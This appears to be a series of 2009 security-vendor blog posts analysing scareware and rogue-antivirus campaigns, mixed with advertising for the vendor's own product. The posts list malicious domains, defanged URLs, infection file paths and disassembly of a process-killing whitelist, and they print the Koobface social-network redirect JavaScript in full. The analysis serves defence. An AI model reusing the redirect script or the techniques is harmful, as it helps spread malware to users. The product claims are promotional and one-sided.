Scareware uses Fake Windows 7 Action Center

Privacy Center, Privacy Components and Safety Center are some of the aliases used by this family of scareware that hide under the guise of a fake Windows 7 Action Center.

The scareware installer uses the filename win_protection_update.exe and once installed, this scareware displays fake scan results in an attempt to convince unsuspecting users into buying the fake software.

A lifetime license for this fake app amounts to a hefty $79.95 plus $19.95 for “Premium Support”.

Here are some domains related to distributing this attack:

software-scaner-online.com
scaner-online-malware.biz

PC Tools Spyware Doctor with Antivirus detects this scareware as RogueAntiSpyware.PrivacyCenter.AJ.

Spyware Doctor with AntiVirus 2010 gets 4.5 out of 5 stars from How-to Geek

PC Tools’ award winning Spyware Doctor with AntiVirus 2010 has done it again, earning a rating of 4.5 out of 5 stars as reviewed by How-to Geek.

Spyware Doctor with Antivirus is a top-rated malware, spyware & virus removal utility that detects, removes and protects your PC from thousands of potential spyware, adware, trojans, viruses, keyloggers, spybots and tracking threats. Spyware Doctor’s advanced Intelliguard technology only alerts users on a true spyware and virus detection. Spyware Doctor with Antivirus has the most advanced update feature that continually improves its spyware and virus fighting capabilities on a daily basis. As spyware gets more complex in order to avoid detection, Spyware Doctor responds with new technology to stay one step ahead.

More details here.

MaCatte scareware fools users by masquerading as McAfee

MaCatte Antivirus is a rogue av that attempts to impersonate McAfee scanners in order to scam users, which PC Tools Spyware Doctor with Antivirus aptly detects as RogueAntiSpyware.MaCatte

This scareware has been seen to be using a bogus My Computer online scan similar to ones we’ve seen here, here and here.

The online scan can be seen on this url:

hxxp://proscan5.info/25/26-088wLzQzL1EzL==

The downloader being served from this url is time-sensitive and will not work after a period of time. A session ID of some sort is embedded on the binary executable itself. After such time has elapsed, the downloader tells the user to contact MaCatte Antivirus support people. This prevents reverse-engineers from replicating the infection and gathering samples for analysis.

Presence of these files / folders would signal infection from this scareware:
C:\Documents and Settings\All Users\Application Data\msca
C:\Documents and Settings\All Users\Application Data\msca\MaCatte.ico
C:\Documents and Settings\All Users\Application Data\msca\mcull.exe
C:\Documents and Settings\All Users\Application Data\msca\msc.exe
C:\Documents and Settings\All Users\Application Data\msca\Viruses.dat
C:\Documents and Settings\All Users\Application Data\Microsoft\Media\WPtect.dll
C:\Documents and Settings\All Users\Desktop\MaCatte.lnk
C:\Documents and Settings\All Users\Start Menu\Programs\MaCatte
C:\Documents and Settings\All Users\Start Menu\Programs\MaCatte\MaCatte.lnk

Unsuspecting users are set back from their hard-earned money by a hefty $99.

Stay away from these rogue apps.

Spyware Doctor with AntiVirus 2010 wins PC Mag Editor’s Choice

This just in: on 15th October 2009, Spyware Doctor with AntiVirus 2010 wins PC Mag Editor’s Choice award!

The latest Spyware Doctor proved effective in every area of malware removal and blocking. It’s a great product.

The award-winning Spyware Doctor with AntiVirus 2010 can be downloaded here.

Bogus MS Update

The analysts at the PC Tools Malware Research Centre have been receiving bogus emails claiming to be coming from Microsoft:

…public distribution of this Update through the official website »www.microsoft.com would have result in efficient creation of a malicious software, we made a decision to issue an experimental private version of an update for all users Microsoft Windows OS.
as the computer set to receive notifications when new updates are available, which you have received this notice.

We have seen emails containing one of the following links:
hxxp://www2.sinel.com/microsoftupdate.html
hxxp://mail1.e-corecorporation.com/default.htm

They seem to be compromized websites being used by the bad guys in order to facilitate this attack.

The page default.html from hxxp://mail1.e-corecorporation.com/default.htm uses a refresh-type redirect to this url:
hxxp://0xc0.0xdc.0x6e.0xe4/microsoftupdate.html

The page microsoftupdate.html from sinel.com and 0xc0.0xdc.0x6e.0xe4 both execute another refresh-type redirect in order to download a file named update09.exe, which PC Tools Spyware Doctor with Antivirus detects as Trojan-Spy.Zbot.YETH.

Interestingly enough, this attack uses 0xc0.0xdc.0x6e.0xe4 to serve the malware. This IP-address translates to 192.220.110.228, which in turn resolves to summit102.summitdesign.net, another possibly compromised website used in this attack.

The presence of the following files/folders may indicate signs of infection:
%System%\sdra64.exe
%Temp%\tmp.exe
%System%\lowsec\

More here.

Another Shameless SEO based on Atlanta Flooding

Users Googling “Atlanta flood pictures” receive a yet another SEO attack, using a possibly compromised legitimate Australian website hosting restaurants in the famous Bondi area.

Here’s a screenshot of a google search result:

A Fiddler capture shows us the redirections:

So we go from
hxxp://idrb.com/pdf_files/atlanta-flood-pictures.html
>hxxp://06d.ru/t.php
>>hxxp://read-cnn2.com/?pid=207&sid=de9f8f
>>>hxxp://winfixscanner7.com/scan1/?pid=207&engine=pHTyzjTyMzEyOS44Mi4xOTAmdGltZT0xMjUuNgAMPAVN

An installer named Soft_207.exe will be presented for download, which PC Tools Spyware Doctor with Antivirus aptly detects as RogueAntiSpyware.TotalSecurity.

At the moment, the PC Tools Malware Research Centre has observed the following domains being used for the distribution:
winfixscanner7(dot)com
15scanner(dot)com

These domains resolve to the following IP addresses:
89.47.237.55
89.248.174.61
213.163.89.60

But knowing the trend in scareware, there could be heaps more domains being created as we speak.

PC Tools Spyware Doctor with Antivirus protects its users from RogueAntiSpyware.TotalSecurity.

Scareware asking for ransome: RogueAntiSpyware.System Security

Scareware is BIG business. They use heaps of scare tactics in order to convince unsuspecting users into buying rogue applications. But here’s one that does a bit more than just scaring.

RogueAntiSpyware.System Security terminates almost all running processes. This basically prevents us from using our computers. More importantly, this hinders execution of tools necessary to investigate the infection and aid in removal of this rogue app.

Back in the day, in order to evade detection and removal, malware writers have targeted security-related applications. They have a black list of applications including (but not limited to) the following:

avast.exe
avp.exe
cmd.exe
icesword.exe
kav.exe
regedit.exe
taskmgr.exe

But now they block even the most harmless Windows applications such as calc.exe and notepad.exe. But not all applications should be terminated, because that basically means no Windows. No Windows means no profit so the bad guys need basic Windows functionality. Which tells us that they have probably stopped using blacklisting and shifted to whitelisting instead. They now have a list of applications that they would allow to be executed in the system.

Here’s part of some disassembly taken from a sample of RogueAntiSpyware.System Security, showing us evidence of whitelisting:

Rogue app takes a snapshot of all the processes in the system:

.rsrc:140B4B4F push edi
.rsrc:140B4B50 push 2
.rsrc:140B4B52 call CreateToolhelp32Snapshot
.rsrc:140B4B57 mov [ebp+hObject], eax
...
.rsrc:140B4B79 push ecx
.rsrc:140B4B7A push eax
.rsrc:140B4B7B mov [ebp+var_64C], 22Ch
.rsrc:140B4B85 call Process32FirstW
...
.rsrc:140B4BAB push [ebp+dwProcessId] ; dwProcessId
.rsrc:140B4BB1 push 0 ; bInheritHandle
.rsrc:140B4BB3 push 1FFFFFh ; dwDesiredAccess
.rsrc:140B4BB8 call ds:OpenProcess

It then terminates the processes not found in the white list:
.rsrc:140B4C00 push 0FFFFFFFFh ; uExitCode
.rsrc:140B4C02 push edi ; hProcess
.rsrc:140B4C03 call ebx ; TerminateProcess

and displays this message as a notification in the system tray:
.rsrc:14039998 aApplicationCan: ; DATA XREF: sub_140B4ADD+16A
.rsrc:14039998 unicode 0,
.rsrc:14039998 unicode 0,
.rsrc:14039998 dw 0Ah
.rsrc:14039998 unicode 0, ,0
.rsrc:14039A5E align 10h
.rsrc:14039A60 aWarning: ; DATA XREF: .rsrc:140104BF
.rsrc:14039A60 ; sub_140B4ADD+1DB ...
.rsrc:14039A60 unicode 0, ,0
.rsrc:14039A72 align 4

It then resumes processing the snapshot created earlier and the cycle continues:
.rsrc:140B4CDF lea eax, [ebp+var_64C]
.rsrc:140B4CE5 push eax
.rsrc:140B4CE6 push [ebp+hObject]
.rsrc:140B4CEC call Process32NextW

Here’s the list of applications that the scareware allows:
.rsrc:14046A48 off_14046A48 dd offset aAlg_exe ; DATA XREF: sub_140B49CF+26
.rsrc:14046A48 ; "alg.exe"
.rsrc:14046A4C dd offset aCsrss_exe ; "csrss.exe"
.rsrc:14046A50 dd offset aCtfmon_exe ; "ctfmon.exe"
.rsrc:14046A54 dd offset aExplorer_exe ; "explorer.exe"
.rsrc:14046A58 dd offset aServices_exe ; "services.exe"
.rsrc:14046A5C dd offset aSlsvc_exe ; "slsvc.exe"
.rsrc:14046A60 dd offset aSmss_exe ; "smss.exe"
.rsrc:14046A64 dd offset aSpoolsv_exe ; "spoolsv.exe"
.rsrc:14046A68 dd offset aSvchost_exe ; "svchost.exe"
.rsrc:14046A6C dd offset aSystem ; "system"
.rsrc:14046A70 dd offset aIexplore_exe ; "iexplore.exe"
.rsrc:14046A74 dd offset aLsass_exe ; "lsass.exe"
.rsrc:14046A78 dd offset aLsm_exe ; "lsm.exe"
.rsrc:14046A7C dd offset aNvsvc_exe ; "nvsvc.exe"
.rsrc:14046A80 dd offset aWininit_exe ; "wininit.exe"
.rsrc:14046A84 dd offset aWinlogon_exe ; "winlogon.exe"
.rsrc:14046A88 dd offset aWscntfy_exe ; "wscntfy.exe"
.rsrc:14046A8C dd offset aWuauclt_exe ; "wuauclt.exe"

As we can see, RogueAntiSpyware.System Security is more than just scareware. You won’t be able to properly use your computer unless you buy the rogue app. Sounds more like ransomeware to me.

But, now that we know that it uses whitelisting, we can do a little work around and bypass this technique. We can rename a copy of the tools that we need to run as one of the whitelisted applications and voila! We’ve already taken one step into regaining full use of our infected computer.

We have previously discussed RogueAntiSpyware.System Security being linked to Net-Worm.Koobface and a fake Facebook website at an earlier post.

PC Tools Spyware Doctor with Antivirus detects and removes RogueAntiSpyware.System Security.

Facebook: Rogue AV Farm?

There has been enormous movement related to koobface lately and it has been mostly driven by social networking websites such as Facebook, Tagged, Myspace, Twitter, and many others.

One social networking website that probably tops the list of sites used as attack vectors is Facebook.

Here’s a screenshot of a spoofed Facebook website:

We are presented by a fake codec alert and unsuspecting users usually download and install a malware aptly detected by PC Tools Spyware Doctor as Net-Worm.Koobface.

We have seen koobface being hosted on kukuruku-290709(dot)com, but thanks to the all good guys out there this site has been taken down. But the bad guys have responded and are now using legitimate domains and redirections to serve koobface. We have seen a small patch of code on websites used in the redirection:

wrttnsvqnayay qrqgtlzac
script src ="4fc . js" // edited
qsmypwqmoj bbaspbrq

The strings are random, and so are the names of the javascript files being executed.

Here’s what the javascript file has to offer:

// KROTEG
var abc1 = 'http://kukuruku-290709.com/go/';
var abc2 = 'http://kukuruku-290709.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com', abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com', abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com', abc+'fu.php'],
['twitter.com', abc+'tw.php'],
['hi5.com', abc+'hi5.php'],
['bebo.com', abc+'be.php']
];
var s = '' + document.referrer, r = false;
for (var i = 0; i 0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
location.href = redir;
r = true;
break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;

Since the domain kukuruku-290709(dot)com has been brought down already, we’ll soon most likely see new ones emerge to host koobface.

One of the payloads of koobface is downloading other malware, and currently it is serving Rogue AVs including one that PC Tools Spyware Doctor detects as RogueAntiSpyware.System Security.

We’ve talked about RogueAntiSpyware.System Security in a previous post.

A few weeks prior to today, there has been a lot of buzz about Facebook’s Farm Town app serving up Rogue AVs. And recently Facebook is once-again associated with Rogue AVs. Clearly, the bad guys behind these attacks are tyring to make quick bucks by promoting scareware. And of course by using techniques such as Social Engineering , malware and scareware spread rather quickly and easily, because attackers can hide behind the names of even the people we trust.

Take extreme care when viewing emails, tweets, comments or posts. Even if they came from people we know.